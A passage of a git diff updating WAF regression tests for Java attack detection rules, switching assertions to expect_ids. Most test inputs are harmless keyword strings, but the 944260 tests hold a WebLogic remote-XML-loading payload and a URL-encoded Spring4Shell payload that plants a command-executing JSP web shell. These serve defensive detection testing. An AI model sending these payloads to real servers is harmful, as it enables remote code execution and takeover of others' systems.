expect_ids: [944240] - test_id: 69 desc: "Cookie test includes keyword runtime.prototypeserializationfactory" stages: @@ -1333,7 +1401,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 70 desc: "Cookie name includes keyword runtime.prototypeserializationfactory" stages: @@ -1353,7 +1422,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 71 desc: "Request header test includes keyword runtime.prototypeserializationfactory" stages: @@ -1373,7 +1443,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 72 desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" stages: @@ -1392,7 +1463,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 73 desc: "XML element value includes keyword runtime.prototypeserializationfactory" stages: @@ -1411,7 +1483,8 @@ tests: version: "HTTP/1.0" data: "runtime.prototypeserializationfactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 74 desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" stages: @@ -1430,7 +1503,8 @@ tests: version: "HTTP/1.0" data: "runtime.prototypeserializationfactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 75 desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" stages: @@ -1449,7 +1523,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.prototypeserializationfactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 76 desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" stages: @@ -1468,7 +1543,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"runtime.prototypeserializationfactory\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 77 desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" stages: @@ -1487,7 +1563,8 @@ tests: version: "HTTP/1.0" data: "{\"runtime.prototypeserializationfactory\": \"test\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 78 desc: "Argument test includes keyword runtime.whileclosure" stages: @@ -1506,7 +1583,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.whileclosure" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 79 desc: "Argument name includes keyword runtime.whileclosure" stages: @@ -1525,7 +1603,8 @@ tests: version: "HTTP/1.0" data: "runtime.whileclosure=test" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 80 desc: "Cookie test includes keyword runtime.whileclosure" stages: @@ -1545,7 +1624,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 81 desc: "Cookie name includes keyword runtime.whileclosure" stages: @@ -1565,7 +1645,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 82 desc: "Request header test includes keyword runtime.whileclosure" stages: @@ -1585,7 +1666,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 83 desc: "XML attribute value includes keyword runtime.whileclosure" stages: @@ -1604,7 +1686,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 84 desc: "XML element value includes keyword runtime.whileclosure" stages: @@ -1623,7 +1706,8 @@ tests: version: "HTTP/1.0" data: "runtime.whileclosure" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 85 desc: "Nested XML element value includes keyword runtime.whileclosure" stages: @@ -1642,7 +1726,8 @@ tests: version: "HTTP/1.0" data: "runtime.whileclosure" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 86 desc: "Content-Type text/plain includes keyword runtime.whileclosure" stages: @@ -1661,7 +1746,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.whileclosure" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 87 desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" stages: @@ -1680,7 +1766,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"runtime.whileclosure\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 88 desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" stages: @@ -1699,4 +1786,5 @@ tests: version: "HTTP/1.0" data: "{\"runtime.whileclosure\": \"test\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml index e01631dc0..19789faf8 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml @@ -22,7 +22,8 @@ tests: version: "HTTP/1.0" data: "test=java.evil.runtime" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 2 desc: "Argument name includes keyword java.evil.runtime" stages: @@ -41,7 +42,8 @@ tests: version: "HTTP/1.0" data: "java.evil.runtime=test" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 3 desc: "Cookie test includes keyword java.evil.runtime" stages: @@ -61,7 +63,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 4 desc: "Cookie name includes keyword java.evil.runtime" stages: @@ -81,7 +84,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 5 desc: "Request header test includes keyword java.evil.runtime" stages: @@ -101,7 +105,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 6 desc: "XML attribute value includes keyword java.evil.runtime" stages: @@ -120,7 +125,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 7 desc: "XML element value includes keyword java.evil.runtime" stages: @@ -139,7 +145,8 @@ tests: version: "HTTP/1.0" data: "java.evil.runtime" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 8 desc: "Nested XML element value includes keyword java.evil.runtime" stages: @@ -158,7 +165,8 @@ tests: version: "HTTP/1.0" data: "java.evil.runtime" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 9 desc: "Content-Type text/plain includes keyword java.evil.runtime" stages: @@ -177,7 +185,8 @@ tests: version: "HTTP/1.0" data: "test=java.evil.runtime" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 10 desc: "Content-Type application/json arg value includes keyword java.evil.runtime" stages: @@ -196,7 +205,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.evil.runtime\"}" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 11 desc: "Content-Type application/json arg name includes keyword java.evil.runtime" stages: @@ -215,7 +225,8 @@ tests: version: "HTTP/1.0" data: "{\"java.evil.runtime\": \"test\"}" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 12 desc: "Argument test includes keyword java.evil.processbuilder" stages: @@ -234,7 +245,8 @@ tests: version: "HTTP/1.0" data: "test=java.evil.processbuilder" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 13 desc: "Argument name includes keyword java.evil.processbuilder" stages: @@ -253,7 +265,8 @@ tests: version: "HTTP/1.0" data: "java.evil.processbuilder=test" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 14 desc: "Cookie test includes keyword java.evil.processbuilder" stages: @@ -273,7 +286,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 15 desc: "Cookie name includes keyword java.evil.processbuilder" stages: @@ -293,7 +307,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 16 desc: "Request header test includes keyword java.evil.processbuilder" stages: @@ -313,7 +328,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 17 desc: "XML attribute value includes keyword java.evil.processbuilder" stages: @@ -332,7 +348,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 18 desc: "XML element value includes keyword java.evil.processbuilder" stages: @@ -351,7 +368,8 @@ tests: version: "HTTP/1.0" data: "java.evil.processbuilder" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 19 desc: "Nested XML element value includes keyword java.evil.processbuilder" stages: @@ -370,7 +388,8 @@ tests: version: "HTTP/1.0" data: "java.evil.processbuilder" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 20 desc: "Content-Type text/plain includes keyword java.evil.processbuilder" stages: @@ -389,7 +408,8 @@ tests: version: "HTTP/1.0" data: "test=java.evil.processbuilder" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 21 desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" stages: @@ -408,7 +428,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.evil.processbuilder\"}" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] - test_id: 22 desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" stages: @@ -427,4 +448,5 @@ tests: version: "HTTP/1.0" data: "{\"java.evil.processbuilder\": \"test\"}" output: - log_contains: "id \"944250\"" + log: + expect_ids: [944250] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml index 82eaddb4e..bf411fe7c 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml @@ -19,7 +19,8 @@ tests: version: "HTTP/1.1" data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" output: - log_contains: "id \"944260\"" + log: + expect_ids: [944260] - test_id: 2 desc: "Spring Framework RCE" stages: @@ -35,4 +36,5 @@ tests: version: "HTTP/1.1" data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" output: - log_contains: "id \"944260\"" + log: + expect_ids: [944260] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml index 15685453b..dc8a22494 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml @@ -22,7 +22,8 @@ tests: version: "HTTP/1.0" data: "test=cnVudGltZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 2 desc: "Argument name includes keyword cnVudGltZQ" stages: @@ -41,7 +42,8 @@ tests: version: "HTTP/1.0" data: "cnVudGltZQ=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 3 desc: "Cookie test includes keyword cnVudGltZQ" stages: @@ -61,7 +63,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 4 desc: "Cookie name includes keyword cnVudGltZQ" stages: @@ -81,7 +84,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 5 desc: "Request header test includes keyword cnVudGltZQ" stages: @@ -101,7 +105,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 6 desc: "XML attribute value includes keyword cnVudGltZQ" stages: @@ -120,7 +125,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 7 desc: "XML element value includes keyword cnVudGltZQ" stages: @@ -139,7 +145,8 @@ tests: version: "HTTP/1.0" data: "cnVudGltZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 8 desc: "Nested XML element value includes keyword cnVudGltZQ" stages: @@ -158,7 +165,8 @@ tests: version: "HTTP/1.0" data: "cnVudGltZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 9 desc: "Content-Type text/plain includes keyword cnVudGltZQ" stages: @@ -177,7 +185,8 @@ tests: version: "HTTP/1.0" data: "test=cnVudGltZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 10 desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" stages: @@ -196,7 +205,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"cnVudGltZQ\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 11 desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" stages: @@ -215,7 +225,8 @@ tests: version: "HTTP/1.0" data: "{\"cnVudGltZQ\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 12 desc: "Argument test includes keyword HJ1bnRpbWU" stages: @@ -234,7 +245,8 @@ tests: version: "HTTP/1.0" data: "test=HJ1bnRpbWU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 13 desc: "Argument name includes keyword HJ1bnRpbWU" stages: @@ -253,7 +265,8 @@ tests: version: "HTTP/1.0" data: "HJ1bnRpbWU=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 14 desc: "Cookie test includes keyword HJ1bnRpbWU" stages: @@ -273,7 +286,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 15 desc: "Cookie name includes keyword HJ1bnRpbWU" stages: @@ -293,7 +307,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 16 desc: "Request header test includes keyword HJ1bnRpbWU" stages: @@ -313,7 +328,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 17 desc: "XML attribute value includes keyword HJ1bnRpbWU" stages: @@ -332,7 +348,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 18 desc: "XML element value includes keyword HJ1bnRpbWU" stages: @@ -351,7 +368,8 @@ tests: version: "HTTP/1.0" data: "HJ1bnRpbWU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 19 desc: "Nested XML element value includes keyword HJ1bnRpbWU" stages: @@ -370,7 +388,8 @@ tests: version: "HTTP/1.0" data: "HJ1bnRpbWU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 20 desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" stages: @@ -389,7 +408,8 @@ tests: version: "HTTP/1.0" data: "test=HJ1bnRpbWU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 21 desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" stages: @@ -408,7 +428,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"HJ1bnRpbWU\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 22 desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" stages: @@ -427,7 +448,8 @@ tests: version: "HTTP/1.0" data: "{\"HJ1bnRpbWU\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 23 desc: "Argument test includes keyword BydW50aW1l" stages: @@ -446,7 +468,8 @@ tests: version: "HTTP/1.0" data: "test=BydW50aW1l" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 24 desc: "Argument name includes keyword BydW50aW1l" stages: @@ -465,7 +488,8 @@ tests: version: "HTTP/1.0" data: "BydW50aW1l=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 25 desc: "Cookie test includes keyword BydW50aW1l" stages: @@ -485,7 +509,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 26 desc: "Cookie name includes keyword BydW50aW1l" stages: @@ -505,7 +530,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 27 desc: "Request header test includes keyword BydW50aW1l" stages: @@ -525,7 +551,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 28 desc: "XML attribute value includes keyword BydW50aW1l" stages: @@ -544,7 +571,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 29 desc: "XML element value includes keyword BydW50aW1l" stages: @@ -563,7 +591,8 @@ tests: version: "HTTP/1.0" data: "BydW50aW1l" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 30 desc: "Nested XML element value includes keyword BydW50aW1l" stages: @@ -582,7 +611,8 @@ tests: version: "HTTP/1.0" data: "BydW50aW1l" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 31 desc: "Content-Type text/plain includes keyword BydW50aW1l" stages: @@ -601,7 +631,8 @@ tests: version: "HTTP/1.0" data: "test=BydW50aW1l" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 32 desc: "Content-Type application/json arg value includes keyword BydW50aW1l" stages: @@ -620,7 +651,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"BydW50aW1l\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 33 desc: "Content-Type application/json arg name includes keyword BydW50aW1l" stages: @@ -639,7 +671,8 @@ tests: version: "HTTP/1.0" data: "{\"BydW50aW1l\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 34 desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: @@ -658,7 +691,8 @@ tests: version: "HTTP/1.0" data: "test=cHJvY2Vzc2J1aWxkZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 35 desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: @@ -677,7 +711,8 @@ tests: version: "HTTP/1.0" data: "cHJvY2Vzc2J1aWxkZXI=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 36 desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: @@ -697,7 +732,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 37 desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: @@ -717,7 +753,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 38 desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: @@ -737,7 +774,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 39 desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: @@ -756,7 +794,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 40 desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: @@ -775,7 +814,8 @@ tests: version: "HTTP/1.0" data: "cHJvY2Vzc2J1aWxkZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 41 desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: @@ -794,7 +834,8 @@ tests: version: "HTTP/1.0" data: "cHJvY2Vzc2J1aWxkZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 42 desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" stages: @@ -813,7 +854,8 @@ tests: version: "HTTP/1.0" data: "test=cHJvY2Vzc2J1aWxkZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 43 desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: @@ -832,7 +874,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 44 desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: @@ -851,7 +894,8 @@ tests: version: "HTTP/1.0" data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 45 desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" stages: @@ -870,7 +914,8 @@ tests: version: "HTTP/1.0" data: "test=HByb2Nlc3NidWlsZGVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 46 desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" stages: @@ -889,7 +934,8 @@ tests: version: "HTTP/1.0" data: "HByb2Nlc3NidWlsZGVy=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 47 desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" stages: @@ -909,7 +955,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 48 desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" stages: @@ -929,7 +976,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 49 desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" stages: @@ -949,7 +997,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 50 desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" stages: @@ -968,7 +1017,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 51 desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: @@ -987,7 +1037,8 @@ tests: version: "HTTP/1.0" data: "HByb2Nlc3NidWlsZGVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 52 desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: @@ -1006,7 +1057,8 @@ tests: version: "HTTP/1.0" data: "HByb2Nlc3NidWlsZGVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 53 desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" stages: @@ -1025,7 +1077,8 @@ tests: version: "HTTP/1.0" data: "test=HByb2Nlc3NidWlsZGVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 54 desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" stages: @@ -1044,7 +1097,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 55 desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" stages: @@ -1063,7 +1117,8 @@ tests: version: "HTTP/1.0" data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 56 desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1082,7 +1137,8 @@ tests: version: "HTTP/1.0" data: "test=Bwcm9jZXNzYnVpbGRlcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 57 desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1101,7 +1157,8 @@ tests: version: "HTTP/1.0" data: "Bwcm9jZXNzYnVpbGRlcg=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 58 desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1121,7 +1178,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 59 desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1141,7 +1199,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 60 desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1161,7 +1220,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 61 desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1180,7 +1240,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 62 desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1199,7 +1260,8 @@ tests: version: "HTTP/1.0" data: "Bwcm9jZXNzYnVpbGRlcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 63 desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1218,7 +1280,8 @@ tests: version: "HTTP/1.0" data: "Bwcm9jZXNzYnVpbGRlcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 64 desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1237,7 +1300,8 @@ tests: version: "HTTP/1.0" data: "test=Bwcm9jZXNzYnVpbGRlcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 65 desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1256,7 +1320,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 66 desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1275,7 +1340,8 @@ tests: version: "HTTP/1.0" data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 67 desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1294,7 +1360,8 @@ tests: version: "HTTP/1.0" data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 68 desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1313,7 +1380,8 @@ tests: version: "HTTP/1.0" data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 69 desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1333,7 +1401,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 70 desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1353,7 +1422,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 71 desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1373,7 +1443,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 72 desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1392,7 +1463,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 73 desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1411,7 +1483,8 @@ tests: version: "HTTP/1.0" data: "Y2xvbmV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 74 desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1430,7 +1503,8 @@ tests: version: "HTTP/1.0" data: "Y2xvbmV0cmFuc2Zvcm1lcg" output: - log_contains: 